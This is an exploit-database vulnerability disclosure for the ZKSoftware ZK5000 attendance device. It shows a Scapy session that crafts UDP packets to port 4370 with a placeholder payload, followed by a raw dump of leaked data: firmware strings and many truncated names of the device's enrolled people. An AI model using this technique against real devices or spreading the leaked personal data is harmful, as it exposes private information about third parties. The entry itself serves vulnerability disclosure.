ZKSoftware 'ZK5000' - Remote Information Disclosure

EDB-ID:

33907

CVE:

N/A


Author:

fb1h2s

Type:

remote


Platform:

Multiple

Date:

2010-03-20


source: https://www.securityfocus.com/bid/39789/info

The ZKSoftware ZK5000 device is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

Response from a coustom made scapy packets:-
#####################################################################################################
fb1h2s@fb1h2s:~$ sudo scapy
[sudo] password for adminuser:
/var/lib/python-support/python2.5/scapy.py:3118: Warning: 'with' will become a reserved keyword in Python 2.6
/var/lib/python-support/python2.5/scapy.py:3120: Warning: 'with' will become a reserved keyword in Python 2.6
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump()
Welcome to Scapy (v1.1.1 / -)
>>>ip=IP("192.168.*.*)
>>>udp=UDP(sport=4371,dport=4370)
>>>payload="Coustomcommands"
>>packet=ip/udp/payload
>>> sniff
<function sniff at 0x9f0333c>
>>sr1(packet)
Begin emission:
Finished to send 1 packets.
You could possibly get any thing you want from the system
BINGO :D
 
I am including a dump of the UDP communication with the hardware, and the data leakage as a reason of improper authentication.
 
...........Q[...L.WU[.....f.[...Ver 6.21 Sep  4 2008.....[...~OS.....[...~OS=1...hv[...~ExtendFmt...f>[...~ExtendFmt=0...jW[...ExtendOPLog.....[...ExtendOPLog=...X.[...~Platform.....[...~Platform=ZEM500.E..Y[...H....Q[...... .[...WorkCode....r[...WorkCode=0....E[.................F[..............3....D[..............@[.............U.........d......
MMr.K.Sug........d...e......MMr. Sant.)......e...f......MMrs. Anu/@......f...g......MMr. Kris@@......g...h......MMr. Domian......h...i......MMrs. Sho`n......i...j......MMr. B. S~)......j...k......MMs. Bhag_n......k...l......MMs. NishYn......l...m......MMr. Moha.)......m...n......
MMr. ChanXn......n...o......MMrs. Ruk^n......o...p......MMr. Prad.g......p...q......MMr. Kuma\n......q...r......MMr. Dhan[n......r...s......MMr. NirmZn......s...t......MMs. Lali1@......t...u......MMs. Nave.)......u...v......MMs. Sudh.)......v...w......
MMs. Anit2@......w...x......MMs. Poon3@......x...y......MMrs. Gee=@......y...z......MMs. Vidh<@......z...{......MMrs. BanB@......{...|......MMrs. Man]n......|...}......MMr.G.ThiWn......}...~......MMs. Indi........~..........MMrs. Jot...................MMrs. Kav...................
MMr. Thiy...................MMr. Prak.8.................MMs. Love.8.................MMr. Sund.8.................MMr. Kart.8.................MMs. Koma.8.................MMr. Prad.8.................MMr. ........MaheB`.................MMr. RajkC`.................MMr. NataD`.................MMr. ManoE`.................MMr. Varu<`.................
MMr. Than@`.................MMr. Rich=`.................MMr. Prak>`.................MMrs.A.Us?`.................MMrs.B.KaA`.................MMs. Banu._.................MMr. Stal.@.................MMr. Chan.@.................MMr. DhanQn.................MMr. MukiRn.................MMrs. Satcn.................MMs. Gomabn.................MMr. Ramadn.................
MMrs. Geeen.................
Trimmed....
 
Current vulnerability is checked and verified with zk5000 hardware model, possibly all other versions would be vulnerable.